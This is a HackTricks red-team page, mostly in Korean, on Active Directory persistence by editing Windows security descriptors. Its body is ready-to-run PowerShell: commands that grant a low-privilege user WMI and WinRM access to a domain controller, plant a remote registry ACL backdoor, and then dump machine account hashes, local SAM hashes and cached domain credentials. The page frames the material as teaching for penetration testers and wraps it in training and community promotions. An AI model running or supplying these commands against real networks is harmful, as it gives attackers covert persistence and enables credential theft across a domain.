5.3 KiB
보안 설명자
{% hint style="success" %}
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.
보안 설명자
문서에서: 보안 설명자 정의 언어(SDDL)는 보안 설명자를 설명하는 데 사용되는 형식을 정의합니다. SDDL은 DACL 및 SACL에 대해 ACE 문자열을 사용합니다: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;
보안 설명자는 객체가 객체에 대해 가진 권한을 저장하는 데 사용됩니다. 객체의 보안 설명자에서 조금만 변경하면, 특권 그룹의 구성원이 될 필요 없이 해당 객체에 대한 매우 흥미로운 권한을 얻을 수 있습니다.
따라서 이 지속성 기술은 특정 객체에 대해 필요한 모든 권한을 얻는 능력을 기반으로 하며, 일반적으로 관리자 권한이 필요한 작업을 수행할 수 있지만 관리자일 필요는 없습니다.
WMI 접근
사용자에게 원격 WMI 실행 권한을 부여할 수 있습니다 이 방법을 사용하여:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
Access to WinRM
사용자에게 winrm PS 콘솔에 대한 액세스 제공 이것을 사용하여:
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
해시 원격 접근
레지스트리에 접근하고 해시 덤프를 생성하여 Reg 백도어를 사용하여 DAMP, 언제든지 컴퓨터의 해시, SAM 및 컴퓨터의 모든 캐시된 AD 자격 증명을 검색할 수 있습니다. 따라서, 이는 도메인 컨트롤러 컴퓨터에 대한 일반 사용자에게 이 권한을 부여하는 데 매우 유용합니다:
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
Check Silver Tickets to learn how you could use the hash of the computer account of a Domain Controller.
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.